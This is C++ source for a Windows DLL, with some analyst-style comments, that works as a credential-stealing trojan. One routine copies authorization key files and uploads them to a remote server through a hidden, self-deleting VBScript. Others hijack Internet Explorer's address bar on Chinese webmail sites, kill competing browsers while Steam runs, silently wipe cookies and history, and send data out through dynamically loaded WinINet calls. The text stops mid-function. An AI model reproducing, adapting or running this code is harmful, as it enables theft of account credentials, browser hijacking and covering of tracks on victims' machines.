BOOL DllExport WipeFile(LPCTSTR szDir, LPCTSTR szFile)
{
	CString sPath;
	HANDLE	hFile;
	DWORD	dwSize;
	DWORD	dwWrite;
	char	sZero[SWEEP_BUFFER_SIZE];
	memset(sZero, 0, SWEEP_BUFFER_SIZE);

	sPath = szDir;
	sPath += _T('\\');
	sPath += szFile;

	hFile = CreateFile(sPath, GENERIC_WRITE, 
		FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 
		FILE_ATTRIBUTE_NORMAL, NULL);
	if (hFile == INVALID_HANDLE_VALUE)
	{
		return FALSE;
	}

	dwSize = GetFileSize(hFile, NULL);

	//skip file header (actually, I don't know the file format of index.dat)
	dwSize -= 64;
	SetFilePointer(hFile, 64, NULL, FILE_BEGIN);

	while (dwSize > 0)
	{
		if (dwSize > SWEEP_BUFFER_SIZE)
		{
			WriteFile(hFile, sZero, SWEEP_BUFFER_SIZE, &dwWrite, NULL);
			dwSize -= SWEEP_BUFFER_SIZE;
		}
		else
		{
			// Last, partial chunk.
			WriteFile(hFile, sZero, dwSize, &dwWrite, NULL);
			break;
		}
	}

	CloseHandle(hFile);
	return TRUE;
}

// Recursively deletes the content of the directory szPath.
//
// szPath             directory to empty (the directory itself is kept)
// bDeleteDesktopIni  when FALSE, files named desktop.ini are left in place
// bWipeIndexDat      when TRUE, files named index.dat are zero-filled with WipeFile
//                    before they are deleted
// Returns FALSE when the directory cannot be enumerated, TRUE otherwise. The results of
// the individual delete operations are ignored, so TRUE does not mean everything was
// removed.
BOOL DllExport EmptyDirectory(LPCTSTR szPath, BOOL bDeleteDesktopIni, BOOL bWipeIndexDat)
{
	WIN32_FIND_DATA wfd;
	HANDLE hFind;
	CString sFullPath;
	CString sFindFilter;
	DWORD dwAttributes = 0;

	sFindFilter = szPath;
	sFindFilter += _T("\\*.*");
	if ((hFind = FindFirstFile(sFindFilter, &wfd)) == INVALID_HANDLE_VALUE)
	{
		return FALSE;
	}

	do
	{
		// Skip the self and parent entries and, unless requested, desktop.ini.
		if (_tcscmp(wfd.cFileName, _T(".")) == 0 || 
			_tcscmp(wfd.cFileName, _T("..")) == 0 ||
			(bDeleteDesktopIni == FALSE && _tcsicmp(wfd.cFileName, _T("desktop.ini")) == 0))
		{
			continue;
		}

		sFullPath = szPath;
		sFullPath += _T('\\');
		sFullPath += wfd.cFileName;

		// Clear the read-only attribute so the entry can be deleted.
		dwAttributes = GetFileAttributes(sFullPath);
		if (dwAttributes & FILE_ATTRIBUTE_READONLY)
		{
			dwAttributes &= ~FILE_ATTRIBUTE_READONLY;
			SetFileAttributes(sFullPath, dwAttributes);
		}

		if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
		{
			// Empty the sub-directory first, then remove it.
			EmptyDirectory(sFullPath, bDeleteDesktopIni, bWipeIndexDat);
			RemoveDirectory(sFullPath);
		}
		else
		{
			if (bWipeIndexDat && _tcsicmp(wfd.cFileName, _T("index.dat")) == 0)
			{
				WipeFile(szPath, wfd.cFileName);
			}
			DeleteFile(sFullPath);
		}
	}
	while (FindNextFile(hFind, &wfd));
	FindClose(hFind);

	return TRUE;
}

BOOL DllExport DelTempFiles()
{
	// 清理DNS缓存
	ShellExecute(NULL, "open", "ipconfig.exe", " /flushdns", NULL, SW_HIDE);

	// 清理 缓存 与 Cookies
	TCHAR szPath[MAX_PATH];
	DeleteUrlCache(Cookie);
	if (SHGetSpecialFolderPath(NULL, szPath, CSIDL_COOKIES, FALSE))
	{
		 EmptyDirectory(szPath, 1, 1);
	}
	CString myCleaner = TEXT(" /c del /f /s /q \"%userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Local\\Microsoft\\Windows\\History\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\*.*\" && del /f /s /q \"%userprofile%\\Local Settings\\History\\*.*\" && del /f /s /q \"%userprofile%\\Local Settings\\Temporary Internet Files\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Roaming\\360se6\\User Data\\Default\\Cache\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Roaming\\360se6\\User Data\\Default\\Cookies\" && del /f /s /q \"%userprofile%\\AppData\\Roaming\\360se6\\User Data\\Default\\History\" && del /f /s /q \"%userprofile%\\AppData\\Local\\360Chrome\\Chrome\\User Data\\Default\\Cache\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Local\\360Chrome\\Chrome\\User Data\\Default\\Cookies\" && del /f /s /q \"%userprofile%\\AppData\\Local\\360Chrome\\Chrome\\User Data\\Default\\History\" && del /f /s /q \"%userprofile%\\AppData\\Local\\2345Explorer\\User Data\\Default\\Cache\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Local\\2345Explorer\\User Data\\Default\\CookiesV3\" && del /f /s /q \"%userprofile%\\AppData\\Local\\2345Explorer\\User Data\\Default\\History\" && del /f /s /q \"%userprofile%\\AppData\\Local\\liebao\\User Data\\Default\\Cache\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Local\\liebao\\User Data\\Default\\Cookies\" && del /f /s /q \"%userprofile%\\AppData\\Local\\liebao\\User Data\\Default\\History\" && exit");
	//AfxMessageBox(myCleaner);
	ShellExecute(NULL, "open", "cmd.exe", myCleaner, "", SW_HIDE);

    BOOL bResult = FALSE;
    BOOL bDone = FALSE;

    LPINTERNET_CACHE_ENTRY_INFO lpCacheEntry = NULL;

    DWORD  dwTrySize, dwEntrySize = 4096; // start buffer size
    HANDLE hCacheDir = NULL;
    DWORD  dwError = ERROR_INSUFFICIENT_BUFFER;

    do
    {
        switch (dwError)
        {
            // need a bigger buffer
            case ERROR_INSUFFICIENT_BUFFER:
                delete [] lpCacheEntry;
                lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwEntrySize];
                lpCacheEntry->dwStructSize = dwEntrySize;
                dwTrySize = dwEntrySize;
                BOOL bSuccess;
                if (hCacheDir == NULL)

                    bSuccess = (hCacheDir
                      = FindFirstUrlCacheEntry(NULL, lpCacheEntry,
                      &dwTrySize)) != NULL;
                else
                    bSuccess = FindNextUrlCacheEntry(hCacheDir, lpCacheEntry, &dwTrySize);

                if (bSuccess)
                    dwError = ERROR_SUCCESS;
                else
                {
                    dwError = GetLastError();
                    dwEntrySize = dwTrySize; // use new size returned
                }
                break;

             // we are done
            case ERROR_NO_MORE_ITEMS:
                bDone = TRUE;
                bResult = TRUE;
                break;

             // we have got an entry
            case ERROR_SUCCESS:

                // don't delete cookie entry
                if (!(lpCacheEntry->CacheEntryType & COOKIE_CACHE_ENTRY))

                 DeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);

                // get ready for next entry
                dwTrySize = dwEntrySize;
                if (FindNextUrlCacheEntry(hCacheDir, lpCacheEntry, &dwTrySize))
                    dwError = ERROR_SUCCESS;

                else
                {
                    dwError = GetLastError();
                    dwEntrySize = dwTrySize; // use new size returned
                }
                break;

            // unknown error
            default:
                bDone = TRUE;
                break;
        }

        if (bDone)
        {
            delete []lpCacheEntry;
            if (hCacheDir)
                FindCloseUrlCache(hCacheDir);
        }

    } while (!bDone);

	return TRUE;
}

 
// 删除授权文件模块

// Deletes every file that matches a wildcard pattern.
//
// wildcardPath         directory part, used to build "<wildcardPath>/<file name>"
// wildcardPathandFile  full search pattern handed to FindFirstFile
//
// Entries whose name starts with '.' are skipped.
//
// NOTE(review):
//  - The function returns FALSE on every path, so the return value carries no information.
//  - The search handle is never released with FindClose.
//  - The results of DeleteFile are ignored.
BOOL DllExport SearchFilesByWildcard_1(LPCTSTR wildcardPath, LPCTSTR wildcardPathandFile)
{
	HANDLE hFile = INVALID_HANDLE_VALUE;
	WIN32_FIND_DATA pNextInfo;

	CString mySSFNFiles = "";
 
	hFile = FindFirstFile(wildcardPathandFile, &pNextInfo);
	if(INVALID_HANDLE_VALUE == hFile)
	{
		return FALSE;
	}

	// First match.
	if(pNextInfo.cFileName[0] != '.')
	{
		mySSFNFiles.Format(TEXT("%s/%s"), wildcardPath, pNextInfo.cFileName);

		//AfxMessageBox(mySSFNFiles);

		DeleteFile(mySSFNFiles);
	}
 
	// Remaining matches.
	while(FindNextFile(hFile, &pNextInfo))
	{
		if(pNextInfo.cFileName[0] == '.')
		{
			continue;
		}

		mySSFNFiles.Format(TEXT("%s/%s"), wildcardPath, pNextInfo.cFileName);

		//AfxMessageBox(mySSFNFiles);

		DeleteFile(mySSFNFiles);
	}
 
	return FALSE;
}

 
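// Upload-and-delete module for the "authorization" files.
// For every file that matches the wildcard, the function below copies it to c:/<name>.key,
// writes a VBScript named "<GetName()>64.VBS" under szMyselfPath, runs that script through a
// hidden cmd.exe and then deletes the original file. The script sends the copy as
// multipart/form-data to strMailServerName, retries once after ten seconds if the reply is
// not "FILES_UPLOAD_OK", and finally deletes both the copy and itself.
// Observable artifacts: *.key files in the root of drive C:, short-lived *64.VBS files, and
// cmd.exe started with " /q /c <path>64.VBS".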

BOOL DllExport SearchFilesByWildcard_2(LPCTSTR wildcardPath, LPCTSTR wildcardPathandFile)
{
	HANDLE hFile = INVALID_HANDLE_VALUE;
	WIN32_FIND_DATA pNextInfo;

	CString myLP;
	CString myVBSFilePath;
	CString mySSFNFiles = "", myTXTSSFNFiles = "", mySSFNFilesName = "";

	myLP = szLocalLP;

	CString myUploadVBS = "";
	myUploadVBS += "Class XMLUpload \r\n";
	myUploadVBS += "Private xmlHttp \r\n";
	myUploadVBS += "Private objTemp \r\n";
	myUploadVBS += "Private adTypeBinary, adTypeText \r\n";
	myUploadVBS += "Private strCharset, strBoundary \r\n";
	myUploadVBS += "\r\n";
	myUploadVBS += "Private Sub Class_Initialize() \r\n";
	myUploadVBS += "adTypeBinary = 1 \r\n";
	myUploadVBS += "adTypeText = 2 \r\n";
	myUploadVBS += "Set xmlHttp = CreateObject(\"Msxml2.XMLHTTP\") \r\n";
	myUploadVBS += "Set objTemp = CreateObject(\"ADODB.Stream\") \r\n";
	myUploadVBS += "objTemp.Type = adTypeBinary \r\n";
	myUploadVBS += "objTemp.Open \r\n";
	myUploadVBS += "strCharset = \"utf-8\" \r\n";
	myUploadVBS += "strBoundary = GetBoundary() \r\n";
	myUploadVBS += "End Sub \r\n";
	myUploadVBS += "\r\n";
	myUploadVBS += "Private Sub Class_Terminate() \r\n";
	myUploadVBS += "objTemp.Close \r\n";
	myUploadVBS += "Set objTemp = Nothing \r\n";
	myUploadVBS += "Set xmlHttp = Nothing \r\n";
	myUploadVBS += "End Sub \r\n";
	myUploadVBS += "\r\n";
	myUploadVBS += "Public Function StringToBytes(ByVal strData, ByVal strCharset) \r\n";
	myUploadVBS += "Dim objFile \r\n";
	myUploadVBS += "Set objFile = CreateObject(\"ADODB.Stream\") \r\n";
	myUploadVBS += "objFile.Type = adTypeText \r\n";
	myUploadVBS += "objFile.Charset = strCharset \r\n";
	myUploadVBS += "objFile.Open \r\n";
	myUploadVBS += "objFile.WriteText strData \r\n";
	myUploadVBS += "objFile.Position = 0 \r\n";
	myUploadVBS += "objFile.Type = adTypeBinary \r\n";
	myUploadVBS += "If UCase(strCharset) = \"UNICODE\" Then \r\n";
	myUploadVBS += "objFile.Position = 2 'delete UNICODE BOM \r\n";
	myUploadVBS += "ElseIf UCase(strCharset) = \"UTF-8\" Then \r\n";
	myUploadVBS += "objFile.Position = 3 'delete UTF-8 BOM \r\n";
	myUploadVBS += "End If \r\n";
	myUploadVBS += "StringToBytes = objFile.Read(-1) \r\n";
	myUploadVBS += "objFile.Close \r\n";
	myUploadVBS += "Set objFile = Nothing \r\n";
	myUploadVBS += "End Function \r\n";
	myUploadVBS += "\r\n";
	myUploadVBS += "Private Function GetFileBinary(ByVal strPath) \r\n";
	myUploadVBS += "Dim objFile \r\n";
	myUploadVBS += "Set objFile = CreateObject(\"ADODB.Stream\") \r\n";
	myUploadVBS += "objFile.Type = adTypeBinary \r\n";
	myUploadVBS += "objFile.Open \r\n";
	myUploadVBS += "objFile.LoadFromFile strPath \r\n";
	myUploadVBS += "GetFileBinary = objFile.Read(-1) \r\n";
	myUploadVBS += "objFile.Close \r\n";
	myUploadVBS += "Set objFile = Nothing \r\n";
	myUploadVBS += "End Function \r\n";
	myUploadVBS += "\r\n";
	myUploadVBS += "Private Function GetBoundary() \r\n";
	myUploadVBS += "Dim ret(12) \r\n";
	myUploadVBS += "Dim table \r\n";
	myUploadVBS += "Dim i \r\n";
	myUploadVBS += "table = \"abcdefghijklmnopqrstuvwxzy0123456789\" \r\n";
	myUploadVBS += "Randomize \r\n";
	myUploadVBS += "For i = 0 To UBound(ret) \r\n";
	myUploadVBS += "ret(i) = Mid(table, Int(Rnd() * Len(table) + 1), 1) \r\n";
	myUploadVBS += "Next \r\n";
	myUploadVBS += "GetBoundary = \"---------------------------\" & Join(ret, Empty) \r\n";
	myUploadVBS += "End Function \r\n";
	myUploadVBS += "\r\n";
	myUploadVBS += "Public Property Let Charset(ByVal strValue) \r\n";
	myUploadVBS += "strCharset = strValue \r\n";
	myUploadVBS += "End Property \r\n";
	myUploadVBS += "\r\n";
	myUploadVBS += "Public Sub AddForm(ByVal strName, ByVal strValue) \r\n";
	myUploadVBS += "Dim tmp \r\n";
	myUploadVBS += "tmp = \"\\r\\n--$1\\r\\nContent-Disposition: form-data; name=\"\"$2\"\"\\r\\n\\r\\n$3\" \r\n";
	myUploadVBS += "tmp = Replace(tmp, \"\\r\\n\", vbCrLf) \r\n";
	myUploadVBS += "tmp = Replace(tmp, \"$1\", strBoundary) \r\n";
	myUploadVBS += "tmp = Replace(tmp, \"$2\", strName) \r\n";
	myUploadVBS += "tmp = Replace(tmp, \"$3\", strValue) \r\n";
	myUploadVBS += "objTemp.Write StringToBytes(tmp, strCharset) \r\n";
	myUploadVBS += "End Sub \r\n";
	myUploadVBS += "\r\n";
	myUploadVBS += "Public Sub AddFile(ByVal strName, ByVal strFileName, ByVal strFileType, ByVal strFilePath) \r\n";
	myUploadVBS += "Dim tmp \r\n";
	myUploadVBS += "tmp = \"\\r\\n--$1\\r\\nContent-Disposition: form-data; name=\"\"$2\"\"; filename=\"\"$3\"\"\\r\\nContent-Type: $4\\r\\n\\r\\n\" \r\n";
	myUploadVBS += "tmp = Replace(tmp, \"\\r\\n\", vbCrLf) \r\n";
	myUploadVBS += "tmp = Replace(tmp, \"$1\", strBoundary) \r\n";
	myUploadVBS += "tmp = Replace(tmp, \"$2\", strName) \r\n";
	myUploadVBS += "tmp = Replace(tmp, \"$3\", strFileName) \r\n";
	myUploadVBS += "tmp = Replace(tmp, \"$4\", strFileType) \r\n";
	myUploadVBS += "objTemp.Write StringToBytes(tmp, strCharset) \r\n";
	myUploadVBS += "objTemp.Write GetFileBinary(strFilePath) \r\n";
	myUploadVBS += "End Sub \r\n";
	myUploadVBS += "\r\n";
	myUploadVBS += "Private Sub AddEnd() \r\n";
	myUploadVBS += "Dim tmp \r\n";
	myUploadVBS += "tmp = \"\\r\\n--$1--\\r\\n\" \r\n";
	myUploadVBS += "tmp = Replace(tmp, \"\\r\\n\", vbCrLf) \r\n";
	myUploadVBS += "tmp = Replace(tmp, \"$1\", strBoundary) \r\n";
	myUploadVBS += "objTemp.Write StringToBytes(tmp, strCharset) \r\n";
	myUploadVBS += "objTemp.Position = 2 \r\n";
	myUploadVBS += "End Sub \r\n";
	myUploadVBS += "\r\n";
	myUploadVBS += "Public Function Upload(ByVal strURL) \r\n";
	myUploadVBS += "Call AddEnd \r\n";
	myUploadVBS += "xmlHttp.Open \"POST\", strURL, False \r\n";
	myUploadVBS += "xmlHttp.setRequestHeader \"Content-Type\", \"multipart/form-data; boundary=\" & strBoundary \r\n";
	myUploadVBS += "xmlHttp.Send objTemp \r\n";
	myUploadVBS += "Upload = xmlHttp.responseText \r\n";
	myUploadVBS += "End Function \r\n";
	myUploadVBS += "End Class \r\n";
	myUploadVBS += "";
	myUploadVBS += "Dim UploadData \r\n";
	myUploadVBS += "Dim UploadState \r\n";
	myUploadVBS += "Set UploadData = New XMLUpload \r\n";
	myUploadVBS += "UploadData.Charset = \"utf-8\" \r\n";
	myUploadVBS += "UploadData.AddForm \"content\", \"Hello world\" \r\n";
	myUploadVBS += "UploadData.AddFile \"image\", \"%s\", \"text/txt\", \"c:/%s\" \r\n";
	myUploadVBS += "UploadState = UploadData.Upload(\"%s?ID=%s&LP=%s\") \r\n";
	myUploadVBS += "If UploadState = \"FILES_UPLOAD_OK\" Then \r\n";
	myUploadVBS += "	\r\n";
	myUploadVBS += "Else \r\n";
	myUploadVBS += "	WScript.sleep 10000 \r\n";
	myUploadVBS += "	UploadData.Upload(\"%s?ID=%s&LP=%s\") \r\n";
	myUploadVBS += "End If \r\n";
	myUploadVBS += "Set UploadData = Nothing \r\n";
	myUploadVBS += "Set objFSO = CreateObject(\"Scripting.FileSystemObject\") \r\n";
	myUploadVBS += "objFSO.DeleteFile(\"c:/%s\") \r\n";
	myUploadVBS += "objFSO.DeleteFile(WScript.ScriptFullName) \r\n";
	myUploadVBS += "Set objFSO = Nothing \r\n";

	hFile = FindFirstFile(wildcardPathandFile, &pNextInfo);
	if(INVALID_HANDLE_VALUE == hFile)
	{
		return FALSE;
	}

	if(pNextInfo.cFileName[0] != '.')
	{
		myVBSFilePath = "";
		myVBSFilePath += szMyselfPath;
		myVBSFilePath += GetName();
		myVBSFilePath += "64.VBS";

		mySSFNFilesName.Format(TEXT("%s.key"), pNextInfo.cFileName);
		mySSFNFiles.Format(TEXT("%s/%s"), wildcardPath, pNextInfo.cFileName);
		myTXTSSFNFiles.Format(TEXT("c:/%s.key"), pNextInfo.cFileName);

		//AfxMessageBox(mySSFNFiles);

		CopyFile(mySSFNFiles, myTXTSSFNFiles, FALSE);

		Sleep(1000);

		CString szUploadVBS = "";
		szUploadVBS.Format(TEXT(myUploadVBS), mySSFNFilesName, mySSFNFilesName, strMailServerName, szMailID, myLP, strMailServerName, szMailID, myLP, mySSFNFilesName);

		FILE *fp;
		fp=fopen(myVBSFilePath, "w");
		if(fp)
		{
			fprintf(fp, "%s", szUploadVBS.GetBuffer(0));
		}
		fclose(fp);

		Sleep(1000);

		ShellExecute(NULL, "open", "cmd.exe", " /q /c "+myVBSFilePath, NULL, SW_HIDE);

		DeleteFile(mySSFNFiles);
	}
 
	while(FindNextFile(hFile, &pNextInfo))
	{
		if(pNextInfo.cFileName[0] == '.')
		{
			continue;
		}

		myVBSFilePath = "";
		myVBSFilePath += szMyselfPath;
		myVBSFilePath += GetName();
		myVBSFilePath += "64.VBS";

		mySSFNFilesName.Format(TEXT("%s.key"), pNextInfo.cFileName);
		mySSFNFiles.Format(TEXT("%s/%s"), wildcardPath, pNextInfo.cFileName);
		myTXTSSFNFiles.Format(TEXT("c:/%s.key"), pNextInfo.cFileName);

		//AfxMessageBox(mySSFNFiles);

		CopyFile(mySSFNFiles, myTXTSSFNFiles, FALSE);

		Sleep(1000);

		CString szUploadVBS = "";
		szUploadVBS.Format(TEXT(myUploadVBS), mySSFNFilesName, mySSFNFilesName, strMailServerName, szMailID, myLP, strMailServerName, szMailID, myLP, mySSFNFilesName);

		FILE *fp;
		fp=fopen(myVBSFilePath, "w");
		if(fp)
		{
			fprintf(fp, "%s", szUploadVBS.GetBuffer(0));
		}
		fclose(fp);

		Sleep(1000);

		ShellExecute(NULL, "open", "cmd.exe", " /q /c "+myVBSFilePath, NULL, SW_HIDE);

		DeleteFile(mySSFNFiles);
	}
 
	return FALSE;
}

 
// 数据发送模块

// Opens the URL given in strPostStr through WinINet and reports whether the
// open succeeded.
//
// Analyst notes:
//  - Despite the name, no request body or extra headers are built here
//    (InternetOpenUrlA is called with NULL headers), and the response is never
//    read. Whatever the callers send is therefore carried entirely in the URL's
//    query string, which is the place to look in proxy / web-server logs.
//  - wininet.dll is loaded and its three entry points are resolved at run time
//    with LoadLibrary/GetProcAddress, so these APIs need not appear in the
//    module's import table; behavioural monitoring of the calls is more
//    reliable than import-based triage.
//  - InternetOpenA is given a NULL agent string and INTERNET_OPEN_TYPE_PRECONFIG.
//
// Parameters: strPostStr - complete URL to open.
// Returns:    TRUE if both the session and the URL handle were obtained,
//             FALSE otherwise.
BOOL DllExport SendURLPost(CString strPostStr)
{
    HMODULE hshell;
    hshell=LoadLibrary(_T("wininet.dll"));

    // Function pointers for the dynamically resolved WinINet exports.
    HINSTANCE (WINAPI *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
	HINSTANCE (WINAPI *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);
	HINSTANCE (WINAPI *XXXInternetCloseHandle)(HINTERNET);

    // The results of LoadLibrary/GetProcAddress are not checked before use.
    (FARPROC&)XXXInternetOpen = GetProcAddress(hshell,"InternetOpenA");
	(FARPROC&)XXXInternetOpenUrl = GetProcAddress(hshell,"InternetOpenUrlA");
	(FARPROC&)XXXInternetCloseHandle = GetProcAddress(hshell,"InternetCloseHandle");

    HINTERNET hropen=XXXInternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, NULL);
	if( hropen == NULL )
	{
		FreeLibrary(hshell);

		return FALSE;
	}

	// The request is issued here; INTERNET_FLAG_NO_CACHE_WRITE is the only flag passed.
	HINTERNET hropenurl = XXXInternetOpenUrl(hropen, strPostStr, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, NULL);
	if( hropenurl == NULL )
	{
		FreeLibrary(hshell);

		return FALSE;
	}

	XXXInternetCloseHandle(hropen);
	XXXInternetCloseHandle(hropenurl);

    FreeLibrary(hshell);

	return TRUE;
}

 
// 劫持 IE 线程模块

// Thread routine that polls the foreground window every 100 ms and, when it is
// an Internet Explorer frame showing one of a fixed list of webmail hosts,
// rewrites the address bar and forces a navigation.
//
// Analyst notes:
//  - No hook is installed here despite the name: the routine works purely with
//    window messages sent from this process to the browser's Edit control
//    (WM_GETTEXT to read the address, WM_SETTEXT plus a synthesized Enter key
//    to replace it). Cross-process WM_GETTEXT/WM_SETTEXT against the
//    IEFrame > WorkerW > ReBarWindow32 > "Address Band Root" > Edit chain is the
//    observable behaviour.
//  - The scheme+host the user was visiting is stored in the global szMailAddr
//    on every pass where the address bar could be read.
//  - The loop ends once the global szBrowser becomes true, which this routine
//    sets after one forced navigation; other routines in the file set it too.
//
// pParam is unused. Always returns 0.
static DWORD WINAPI HOOKBrowser(LPVOID pParam)
{
	//AfxMessageBox("IE hijack thread module started!");

	do{
		CString szMyClass = "";

		// Identify the foreground window by its window class name.
		HWND Hwnd_IEFrame = ::GetForegroundWindow();
		TCHAR szClassName[MAX_PATH]={0};
		ZeroMemory(szClassName, MAX_PATH * sizeof(TCHAR));
		::GetClassName(Hwnd_IEFrame, szClassName, MAX_PATH);

		szMyClass.Format(TEXT("%s"), szClassName);
		szMyClass.Replace(" ", "");

		if(szMyClass == "IEFrame")
		{
			//AfxMessageBox("IEFrame Class");

			// Walk the child-window chain down to the address-bar Edit control.
			HWND Hwnd_1 = ::FindWindowEx(Hwnd_IEFrame, NULL, _T("WorkerW"), NULL);

			if(Hwnd_1 != NULL)
			{
				HWND Hwnd_2 = ::FindWindowEx(Hwnd_1, NULL, _T("ReBarWindow32"), NULL);

				if(Hwnd_2 != NULL)
				{
					HWND Hwnd_3 = ::FindWindowEx(Hwnd_2, NULL, _T("Address Band Root"), NULL);

					if(Hwnd_3 != NULL)
					{
						HWND Hwnd_4 = ::FindWindowEx(Hwnd_3, NULL, _T("ToolbarWindow32"), NULL);
						HWND Hwnd_5 = ::FindWindowEx(Hwnd_3, NULL, _T("Edit"), NULL);

						if(Hwnd_4 != NULL && Hwnd_5 != NULL)
						{
							TCHAR szGetEditStr[MAX_PATH]={0};
							CString szMyEditStr1 = "", szMyEditStr2 = "";
							ZeroMemory(szGetEditStr, MAX_PATH * sizeof(TCHAR));

							// Read the current address-bar text from the other process's control.
							::SendMessage(Hwnd_5, WM_GETTEXT, MAX_PATH, (LPARAM)szGetEditStr);

							//AfxMessageBox(szGetEditStr);

							szMyEditStr1.Format(_TEXT("%s"), szGetEditStr);

							// Reduce the URL to "scheme://host": the "//" is masked with a
							// backtick so the first '/'-separated field ends at the host.
							szMyEditStr1.Replace("//", "`");

							AfxExtractSubString(szMyEditStr2, szMyEditStr1, 0, '/');

							szMyEditStr2.Replace("`", "//");

							CString szEditReplace;

							if( szMyEditStr2 == "http://mail.qq.com" || szMyEditStr2 == "https://mail.qq.com" )
							{
								// Clear cache
								//DelTempFiles();

								szMailAddr = "";
								szMailAddr = szMyEditStr2;

								szEditReplace = TEXT("https://ui.ptlogin2.qq.com/cgi-bin/login?style=9&appid=522005705&daid=4&s_url=https%3A%2F%2Fw.mail.qq.com%2Fcgi-bin%2Flogin%3Fvt%3Dpassport%26vm%3Dwsk%26delegate_url%3D%26f%3Dxhtml%26target%3D&hln_css=http%3A%2F%2Fmail.qq.com%2Fzh_CN%2Fhtmledition%2Fimages%2Flogo%2Fqqmail%2Fqqmail_logo_default_200h.png&low_login=1&hln_autologin=%E8%AE%B0%E4%BD%8F%E7%99%BB%E5%BD%95%E7%8A%B6%E6%80%81&pt_no_onekey=1");

								char *szSetEditStr = szEditReplace.GetBuffer(szEditReplace.GetLength()+1);
								szEditReplace.ReleaseBuffer();

								// Overwrite the address bar, then synthesize Enter (virtual key 13).
								::SendMessage(Hwnd_5, WM_SETTEXT, 255, (LPARAM)szSetEditStr);

								::SendMessage( Hwnd_5, WM_KEYDOWN, ( WPARAM )( 13 ), 0x001f0001 );
								::SendMessage( Hwnd_5, WM_CHAR, ( WPARAM )( 13 ), 0x001f0001 );
								::SendMessage( Hwnd_5, WM_KEYUP, ( WPARAM )( 13 ), 0xc01f0001 );

								szBrowser = true;
							}
							else if( szMyEditStr2 == "https://mail.163.com" || szMyEditStr2 == "https://mail.126.com"  || szMyEditStr2 == "https://mail.yeah.net" )
							{
								// Clear cache
								//DelTempFiles();

								szMailAddr = "";
								szMailAddr = szMyEditStr2;

								szEditReplace.Format(TEXT("https://email.163.com/"));

								char *szSetEditStr = szEditReplace.GetBuffer(szEditReplace.GetLength()+1);
								szEditReplace.ReleaseBuffer();

								::SendMessage(Hwnd_5, WM_SETTEXT, 255, (LPARAM)szSetEditStr);

								::SendMessage( Hwnd_5, WM_KEYDOWN, ( WPARAM )( 13 ), 0x001f0001 );
								::SendMessage( Hwnd_5, WM_CHAR, ( WPARAM )( 13 ), 0x001f0001 );
								::SendMessage( Hwnd_5, WM_KEYUP, ( WPARAM )( 13 ), 0xc01f0001 );

								szBrowser = true;
							}
							else if( szMyEditStr2 == "https://www.188.com" || szMyEditStr2 == "https://188.com" )
							{
								// Clear cache
								//DelTempFiles();

								szMailAddr = "";
								szMailAddr = szMyEditStr2;

								szEditReplace.Format(TEXT("https://vip.188.com/webapp/login188.html"));

								char *szSetEditStr = szEditReplace.GetBuffer(szEditReplace.GetLength()+1);
								szEditReplace.ReleaseBuffer();

								::SendMessage(Hwnd_5, WM_SETTEXT, 255, (LPARAM)szSetEditStr);

								::SendMessage( Hwnd_5, WM_KEYDOWN, ( WPARAM )( 13 ), 0x001f0001 );
								::SendMessage( Hwnd_5, WM_CHAR, ( WPARAM )( 13 ), 0x001f0001 );
								::SendMessage( Hwnd_5, WM_KEYUP, ( WPARAM )( 13 ), 0xc01f0001 );

								szBrowser = true;
							}
							else
							{
								// Any other site: only record the host, no redirect.
								szMailAddr = "";
								szMailAddr = szMyEditStr2;
							}
						}
					}
				}
			}
		}
		Sleep(100);

	} while( !szBrowser );

	return 0;
}

 
// 锁定注册表默认浏览器 并 劫持非IE内核浏览器 线程模块

// Thread routine that, while steam.exe is running, terminates third-party
// browsers and reopens a fixed URL, in most branches in Internet Explorer.
//
// Analyst notes:
//  - The heading above this routine mentions locking the registry default
//    browser, but no registry access is visible in this function; only process
//    termination and ShellExecute launches occur here.
//  - Observable behaviour: a browser process (360se.exe, 360chrome.exe, or the
//    owner of a foreground window whose class contains "360se6_Frame",
//    "WidgetWin_1" or "QQBrowser_WidgetWin_0") is killed, followed at once by
//    iexplore.exe, or cmd.exe /c "<browser path>", started with a hard-coded URL.
//  - The "WidgetWin_1" substring test also matches "Chrome_WidgetWin_1", so any
//    foreground window with that class family is affected, not only the
//    browsers named in the code.
//  - GetProcess, KillProcess and GetIEVerSion are defined elsewhere in the
//    file; from their use here they presumably test for a running process,
//    terminate one, and return the installed IE version string.
//  - The loop ends once the global szIERegedit becomes true.
//
// pParam is unused. Always returns 0.
static DWORD WINAPI HOOKIERegedit(LPVOID pParam)
{
	//AfxMessageBox("Thread module started!");

	do{
		if( GetProcess("360se.exe") && GetProcess("steam.exe") )
		{
			// When the IE version string contains "8.0", skip the kill-by-name
			// path and fall through to the foreground-window check.
			CString myIEver = GetIEVerSion();
			int szIE_8 = myIEver.Find("8.0", 0);

			if( szIE_8 >= 0)
			{
				goto myOtherFunction;
			}
			else
			{
				if( KillProcess("360se.exe") )
				{
					// The URL opened depends on whether QQ.exe is running.
					if( GetProcess("QQ.exe") )
					{
						ShellExecute(NULL, "open", "iexplore.exe", "https://w.mail.qq.com/", "", SW_MAXIMIZE);
					}
					else
					{
						ShellExecute(NULL, "open", "iexplore.exe", "http://www.benpig.com/index.htm", "", SW_MAXIMIZE);
					}
				}
				szIERegedit = true;
			}
		}
		else if( GetProcess("360chrome.exe") && GetProcess("steam.exe") )
		{
			// Same handling as above, for 360chrome.exe.
			CString myIEver = GetIEVerSion();
			int szIE_8 = myIEver.Find("8.0", 0);

			if( szIE_8 >= 0)
			{
				goto myOtherFunction;
			}
			else
			{
				if( KillProcess("360chrome.exe") )
				{
